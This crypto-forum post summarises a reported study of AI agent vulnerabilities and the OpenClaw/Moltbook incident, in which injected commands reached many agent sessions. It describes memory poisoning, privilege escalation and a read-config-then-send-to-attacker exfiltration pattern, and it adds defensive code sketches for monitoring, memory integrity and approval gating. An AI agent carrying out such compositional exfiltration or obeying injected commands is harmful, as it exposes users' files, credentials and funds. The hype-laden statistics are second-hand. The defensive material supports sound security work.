Devastating proof: 91% of AI Agents are riddled with vulnerabilities and 770k Agents were hacked at once. Is the $BTC in your hands still safe?
Bro, sit tight. Today I'm not talking about anything else, just one thing directly tied to your wallet: your AI Agents, those "digital assistants" that trade for you, manage your email, and even farm airdrops automatically, might already be working for hackers.
A joint research report from top institutions like Stanford, MIT, Carnegie Mellon, and NVIDIA just landed on the table, with data so cold it cuts to the bone: they examined 847 AI Agents running in production environments and found that 91% have toolchain attack vulnerabilities and 94% of memory-enhanced Agents can be "poisoned", like someone pouring laundry detergent into your drinking water while you keep happily drinking it.
Even more terrifying, the study uncovered 2,347 previously unknown vulnerabilities, 23% of which are rated as severe. This is no longer just a lab simulation. The first author of the paper, Owen Sakawa, directly referenced a real case from earlier this year—the OpenClaw/Moltbook incident.
Come, let me tell you about this “textbook-level” black swan. OpenClaw is an open-source AI Agent, released in November 2025, capable of sending emails, managing schedules, executing terminal commands, deploying code, and even maintaining memory across sessions. It has 160k stars on GitHub—hugely popular.
Then someone built a social platform called Moltbook specifically for OpenClaw's Agents. After it went viral, over 770k Agents registered on it. How? Users told their Agents, "Hey, go register an account on Moltbook," and the Agents filled out the forms themselves.
What happened next? The platform’s database had a vulnerability—hackers could bypass authentication and inject commands directly into any Agent session. 770k Agents, each with privileged access to user devices, emails, and files, all compromised.
Security firm Astrix Security used their proprietary tool ClawdHunter to scan and found 42,665 OpenClaw instances on the public internet, with 8 completely open and unprotected—no authentication at all. Cisco’s AI security research team commented: “From a capability perspective, groundbreaking; from a security standpoint, an absolute nightmare.”
Kaspersky’s January 2026 audit identified 512 vulnerabilities, 8 of which are severe. Security researcher Simon Willison summarized the “fatal triangle”—AI Agents can access private data, encounter untrusted content, and communicate externally. When all three sides connect, the hacker’s ideal springboard is formed.
The research team drew a clear line between the security issues of AI Agents and those of general large language models: evaluating an LLM asks, "Can the model produce unsafe content?" while evaluating an Agent asks, "Can the model do unsafe things?", which pulls in tool invocation, state modification, and multi-step plan execution.
Take, for example, an Agent with permission to read files and send HTTP requests. Each step alone is compliant: reading a file isn't illegal, and neither is sending a request. But combined, the two can pull passwords out of configuration files and ship them to an attacker's server. Every individual action looks compliant, yet the end result is data theft. This is called a "compositional security problem."
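To make the compositional problem concrete, here is a minimal sequence-level check. It is a sketch, not anything from the paper: the `ToolCall` record, the `SENSITIVE_HINTS` list, and `flags_exfiltration` are hypothetical names, and a real monitor would need far richer signals than substring matching.

```python
from dataclasses import dataclass

# Illustrative hints for "sensitive-looking" reads; a real policy would be richer.
SENSITIVE_HINTS = (".env", "config", "wallet", "keystore", "id_rsa")

@dataclass
class ToolCall:
    tool: str    # e.g. "read_file" or "http_request"
    target: str  # file path or URL

def flags_exfiltration(session_calls: list[ToolCall]) -> bool:
    """Flag a session where sensitive-looking data was read and the agent
    later communicated externally -- the compositional pattern."""
    touched_sensitive = False
    for call in session_calls:
        if call.tool == "read_file" and any(h in call.target.lower() for h in SENSITIVE_HINTS):
            touched_sensitive = True
        if call.tool == "http_request" and touched_sensitive:
            return True  # each step was benign; the composition is not
    return False

# Each call below looks compliant on its own; together they trip the check.
session = [
    ToolCall("read_file", "~/.aws/config"),
    ToolCall("http_request", "https://attacker.example/upload"),
]
print(flags_exfiltration(session))  # True
```

The point is that the decision has to look at the whole session: a per-call allowlist would wave both of these calls through.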
Controlled testing is even more chilling: privilege escalation attacks on tool-using Agents succeed 95% of the time, and poisoning attacks on memory-enhanced Agents 94%. Even the most robust multi-agent systems still see target drift attacks succeed 58% of the time.
In reinforcement learning-based attack generation tests, the violation rate was 79%, a 25.4% increase over manually designed attacks at 63%. This shows hackers’ weaponry is rapidly expanding, and human red teams can’t keep up.
The study also broke down the 847 deployments by industry: 289 in healthcare (34.1%), 247 in finance (29.2%), 198 in customer service (23.4%), and 113 in code generation (13.3%). Across the six attack categories it mapped, state manipulation led with 612 instances and target drift followed with 573. Tool misuse and chained calls, though third in total at 489, are the most severe: 198 were rated severe, the highest proportion of any category.
And here’s a detail that might keep you awake: the average time for memory poisoning effects to manifest after injection is 3.7 sessions. By the time you notice something’s wrong, hackers might have already used your Agent to do dirty work for two weeks.
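Tamper-evident memory is one way to shrink that window, and it is also part of the baseline the researchers propose below: if persisted state is integrity-checked on every load, a poisoned entry is caught at the next session instead of 3.7 sessions later. Here is a minimal sketch using only Python's standard library; the environment-variable key handling is purely illustrative, use a proper secret store in practice.

```python
import hashlib
import hmac
import json
import os

# Illustrative key handling only: pull the signing key from an env variable.
KEY = os.environ.get("AGENT_MEMORY_KEY", "dev-only-key").encode()

def save_memory(entries: list[dict], path: str = "memory.json") -> None:
    """Persist memory entries together with an HMAC over their contents."""
    blob = json.dumps(entries, sort_keys=True).encode()
    tag = hmac.new(KEY, blob, hashlib.sha256).hexdigest()
    with open(path, "w") as f:
        json.dump({"entries": entries, "tag": tag}, f)

def load_memory(path: str = "memory.json") -> list[dict]:
    """Reject memory whose contents no longer match the stored HMAC."""
    with open(path) as f:
        stored = json.load(f)
    blob = json.dumps(stored["entries"], sort_keys=True).encode()
    expected = hmac.new(KEY, blob, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, stored["tag"]):
        raise ValueError("memory integrity check failed: possible poisoning")
    return stored["entries"]
```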
The researchers proposed a minimum security baseline: enforce runtime monitoring on all production Agents; require manual approval for toolchain operations involving data access and external communication; trigger manual review every 20-25 steps; encrypt and verify the integrity of persistent states in memory-enhanced Agents.
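Here is a rough sketch of the two human-in-the-loop rules from that baseline: explicit approval for risky tool classes, plus a forced pause every 20-25 steps. The `GatedAgent` wrapper, the `RISKY_TOOLS` set, and the `ask_human` hook are assumptions for illustration, not an API from the paper or any particular framework.

```python
REVIEW_EVERY = 20  # the baseline's suggested window is every 20-25 steps
RISKY_TOOLS = {"read_file", "http_request", "send_email", "run_shell"}

def ask_human(prompt: str) -> bool:
    """Placeholder approval hook; wire this to a CLI prompt, Slack, etc."""
    return input(f"{prompt} [y/N] ").strip().lower() == "y"

class GatedAgent:
    """Wraps an agent whose tool calls go through .call(tool, **kwargs) (assumed)."""

    def __init__(self, agent):
        self.agent = agent
        self.steps = 0

    def call(self, tool: str, **kwargs):
        self.steps += 1
        # Rule 1: periodic manual review of the whole run.
        if self.steps % REVIEW_EVERY == 0 and not ask_human(
            f"{self.steps} steps executed, continue this run?"
        ):
            raise RuntimeError("run halted at periodic review")
        # Rule 2: approval for data access and external communication.
        if tool in RISKY_TOOLS and not ask_human(f"Approve {tool} with {kwargs}?"):
            raise PermissionError(f"{tool} denied by operator")
        return self.agent.call(tool, **kwargs)
```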
In terms of monitoring effectiveness, action-level monitoring has a precision of 0.94, sequence-level monitoring an F1 score of 0.85, and state-level monitoring an F1 score of 0.83. During a 30-day test of 127 production Agents, the system intercepted 4,782 operations, with a false positive rate of 3.7%, and 14.6% of flagged operations were confirmed as real attacks.
Note that most of today's so-called "AI governance" frameworks are post-hoc audits rather than real-time constraints during execution. The EU Artificial Intelligence Act is still being phased in and the US NIST AI Risk Management Framework is still evolving, while compliance pressure and security risks are both exploding.
Back to your wallet. If you’re using AI Agents for automated trading, copying, or managing your wallet, you’d better stop immediately and check: does your Agent store your private keys? read your transaction history? have permissions to send data externally?
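If you want something more systematic than eyeballing settings, the self-check can be as small as the sketch below. The permission flags are hypothetical; map them onto whatever your agent framework actually exposes.

```python
def audit_wallet_agent(permissions: dict) -> list[str]:
    """Return warnings for the riskiest permission combinations."""
    warnings = []
    if permissions.get("stores_private_keys"):
        warnings.append("Agent holds private keys: move signing to a hardware "
                        "wallet or a separate signer service.")
    if permissions.get("reads_tx_history") and permissions.get("can_send_external"):
        warnings.append("Agent reads transaction history AND can talk to the "
                        "outside world: a ready-made exfiltration path.")
    if permissions.get("ingests_untrusted_content") and permissions.get("can_send_external"):
        warnings.append("Untrusted inputs plus external communication: a "
                        "prompt-injection springboard.")
    return warnings

# Example: an agent with every risky flag turned on.
for w in audit_wallet_agent({
    "stores_private_keys": True,
    "reads_tx_history": True,
    "can_send_external": True,
    "ingests_untrusted_content": True,
}):
    print("WARNING:", w)
```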
Gary Marcus bluntly said: “Autonomous agents are a complete mess.” This isn’t a joke; it’s a conclusion backed by data.
Data doesn't lie. 847 deployments, 2,347 vulnerabilities, 770k compromised Agents: this isn't a drill. Your $BTC and $ETH sitting in cold wallets are safe for now, but as long as your AI Agent touches the network, it's the thinnest pane of glass standing in front of your assets.
Think for yourself.
Follow me for more real-time analysis and insights into the crypto market! $BTC $ETH $SOL
#Gate Square May Trading Sharing #Bitcoin holds steady above 80k #CryptoMarketRecovery